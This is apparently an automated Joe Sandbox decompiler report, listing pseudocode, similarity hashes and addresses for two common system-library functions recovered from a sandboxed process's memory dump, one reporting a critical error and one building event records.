Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction ID: 5f4945003348198410177b3fb96615c828c0346527267d7aa7cb9739cb8e6c79
Opcode Fuzzy Hash: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction Fuzzy Hash: 4E1184353347038BEF2F4D1DABB2675769DAB95654F24452AD661CB3D1DAB8C8C0C340

Uniqueness

Uniqueness Score: -1.00%

Function 012F8DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E012F8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1320d50);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E012D5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0129DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0129DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0129D130(_t34, _t39, _t40);
			}

0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df3
0x012f8df8
0x012f8dfd
0x012f8e00
0x012f8e0e
0x012f8e2a
0x012f8e36
0x012f8e38
0x012f8e3c
0x012f8e46
0x012f8e46
0x012f8e36
0x012f8e50
0x012f8e56
0x012f8e59
0x012f8e5c
0x012f8e60
0x012f8e67
0x012f8e6d
0x012f8e73
0x012f8e74
0x012f8eb1
0x012f8ebd

Strings

Critical error detected %lx, xrefs: 012F8E21

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction ID: e1cb0cba2a34ac29b20416913fbac52d9fe4bb851433a36192e3b925697dcd65
Opcode Fuzzy Hash: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction Fuzzy Hash: 53115BB5D25349DBDF29DFA886067ACFBB0BB14314F20426DE669AB292C3740602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 01315BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01315BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1321178);
				E0129D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01314C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0128D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01315542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13360e8;
								if( *0x13360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01289710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01286DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0128F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0128F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0128F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0128FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0128FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0128F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0128F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01314CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0129D130(_t427, _t494, _t511);
				}
			}

0x01315ba5
0x01315baa
0x01315baf
0x01315bb4
0x01315bb6
0x01315bbc
0x01315bbe
0x01315bc4
0x01315bcd
0x01315bd3
0x01315bd6
0x01315bdc
0x01315be0
0x01315be3
0x01315beb
0x01315bf2
0x01315bf8
0x01315bfe
0x01315c04
0x01315c0e
0x01315c18
0x01315c1f
0x01315c25
0x01315c2a
0x01315c2c
0x01315c32
0x01315c3a
0x01315c3f
0x01315c42
0x01315c48
0x01315c5b
0x01315c5b
0x01315c2c
0x01315cb7
0x01315cb9
0x01315cbf
0x01315cc2
0x01315cca
0x01315ccb
0x01315ccb
0x01315cd1
0x01315cd7
0x01315cda
0x01315ce1
0x01315ce4
0x01315ce7
0x01315ced
0x01315cf3
0x01315cf9
0x01315cff
0x01315d08
0x01315d0a
0x01315d0e
0x01315d10
0x00000000
0x00000000
0x01315d16
0x01315d1a
0x00000000
0x00000000
0x01315d20
0x01315d22
0x01315d25
0x01315d2f
0x01315d2f
0x01315d33
0x01315d3d
0x01315d49
0x01315d4b
0x00000000
0x00000000
0x01315d5a
0x01315d5d
0x01315d60
0x00000000
0x00000000
0x01315d66
0x01315d69
0x00000000
0x00000000
0x01315d6f
0x01315d6f
0x01315d73
0x01315d79
0x01315d7f
0x01315d86
0x01315d95
0x01315d98
0x01315dba
0x01315dcb
0x01315dce
0x01315dd3
0x01315dd6
0x01315dd8
0x01315de6
0x01315dec
0x01315dee
0x01315df1
0x01315df3
0x0131635a
0x0131635a
0x00000000
0x0131635a
0x01315dfe
0x01315e02
0x01315e05
0x01315e07
0x01315e10
0x01315e13
0x01315e1b
0x01315e1c
0x01315e21
0x01315e22
0x01315e23
0x01315e25
0x01315e2a
0x01315e2c
0x01315e2e
0x01315e36
0x01315e39
0x01315e42
0x01315e47
0x01315e4d
0x01315e54
0x01315e54
0x01315e54
0x01315e2e
0x01315e5c
0x01315e5f
0x01315e62
0x01315e64
0x01315e6b
0x01315e70
0x01315e7a
0x01315e7a
0x01315e7a
0x01315e6b
0x01315e7e
0x01315e7f
0x01315e7f
0x01315e81
0x01315e87
0x01315e8b
0x01315e8c
0x01315e8c
0x01315e8c
0x01315e9a
0x01315e9c
0x01315ea2
0x01315ea6
0x01315f50
0x01315f50
0x01315f57
0x01315f66
0x01315f66
0x01315f66
0x01315f68
0x01315f6a
0x013163d0
0x00000000
0x01315f70
0x01315f70
0x01315f91
0x01315f9c
0x01315f9e
0x01315fa4
0x01315fa6
0x0131638c
0x01316392
0x013163a1
0x013163a7
0x013163af
0x013163af
0x013163bd
0x013163d8
0x00000000
0x013163d8
0x01315fac
0x01315fb2
0x01315fb4
0x01315fbd
0x01315fc6
0x01315fce
0x01315fd4
0x01315fdc
0x01315fec
0x01315fed
0x01315fee
0x01315fef
0x01315ff9
0x01315ffa
0x01315ffb
0x01315ffc
0x01316000
0x01316004
0x01316012
0x01316012
0x01316018
0x01316019
0x0131601a
0x0131601b
0x0131601c
0x01316020
0x01316059
0x0131605c
0x01316061
0x01316061
0x01316022
0x01316022
0x01316022
0x01316025
0x0131602a
0x0131602b
0x01316031
0x01316037
0x01316038
0x0131603e
0x01316048
0x01316049
0x0131604a
0x0131604b
0x0131604c
0x0131604d
0x01316053
0x01316054
0x01316054
0x01316062
0x01316065
0x01316067
0x0131606a
0x01316070
0x01316075
0x01316076
0x01316081
0x01316087
0x01316095
0x01316099
0x0131609e
0x013160a4
0x013160ae
0x013160b0
0x013160b3
0x013160b6
0x013160b8
0x013160ba
0x013160ba
0x013160ba
0x013160ba
0x013160be
0x013160c0
0x013160c5
0x013160c5
0x013160c5
0x013160c6
0x013160cd
0x01316114
0x013160cf
0x013160cf
0x013160d4
0x013160d5
0x013160da
0x013160db
0x013160e1
0x013160e2
0x013160e8
0x013160f8
0x013160fd
0x013160fe
0x01316102
0x01316104
0x01316107
0x01316109
0x0131610b
0x0131610b
0x0131610b
0x0131610b
0x0131610f
0x0131610f
0x01316117
0x0131611a
0x0131611f
0x01316125
0x01316134
0x01316139
0x0131613f
0x01316146
0x01316148
0x0131614b
0x0131614d
0x0131614f
0x0131614f
0x0131614f
0x0131614f
0x01316153
0x01316159
0x01316159
0x0131615c
0x01316163
0x01316169
0x0131616c
0x01316172
0x01316181
0x01316186
0x01316187
0x0131618b
0x01316191
0x01316195
0x013161a3
0x013161bb
0x013161c0
0x013161c3
0x013161cc
0x013161d0
0x013161dc
0x013161de
0x013161e1
0x013161e4
0x013161e6
0x013161e8
0x013161e8
0x013161e8
0x013161e8
0x013161e6
0x013161ec
0x013161f3
0x01316203
0x01316209
0x0131620a
0x01316216
0x0131621d
0x01316227
0x01316241
0x01316246
0x0131624c
0x01316257
0x01316259
0x0131625c
0x0131625e
0x01316260
0x01316260
0x01316260
0x01316260
0x0131625e
0x01316264
0x01316267
0x01316269
0x01316315
0x01316315
0x0131631b
0x0131631e
0x01316324
0x01316327
0x0131632f
0x01316330
0x01316333
0x0131633a
0x0131633c
0x01316335
0x01316335
0x01316335
0x0131633f
0x01316342
0x0131634c
0x01316352
0x01316355
0x01316355
0x01316359
0x00000000
0x0131626f
0x01316275
0x01316275
0x01316278
0x0131627e
0x0131627e
0x01316281
0x01316287
0x0131628d
0x01316298
0x0131629c
0x013162a2
0x0131629e
0x0131629e
0x0131629e
0x013162a7
0x013162a7
0x013162aa
0x013162b0
0x013162f0
0x013162f0
0x013162f2
0x013162f8
0x013162fd
0x013162b2
0x013162b2
0x013162b2
0x013162b5
0x013162dd
0x013162e2
0x013162e5
0x013162b7
0x013162b8
0x013162bb
0x013162bd
0x013162c0
0x013162c4
0x013162cd
0x013162cd
0x013162c0
0x013162bb
0x013162b5
0x01316302
0x01316303
0x01316305
0x01316305
0x01316305
0x0131630c
0x0131630c
0x00000000
0x0131627e
0x01316269
0x01315eac
0x01315ebb
0x01315ebe
0x01315ecb
0x01315ecb
0x01315ece
0x01315ece
0x01315ed4
0x01315ed7
0x01315ed9
0x01315edb
0x01315edb
0x01315ee1
0x01315ee1
0x01315ee3
0x01315f20
0x01315f20
0x01315ee5
0x01315ee5
0x01315ee5
0x01315ee8
0x01315f11
0x01315f18
0x01315eea
0x01315eea
0x01315eed
0x01315ef2
0x01315ef8
0x01315efb
0x01315f0a
0x01315f0a
0x01315eed
0x01315ee8
0x01315f22
0x01315f28
0x00000000
0x00000000
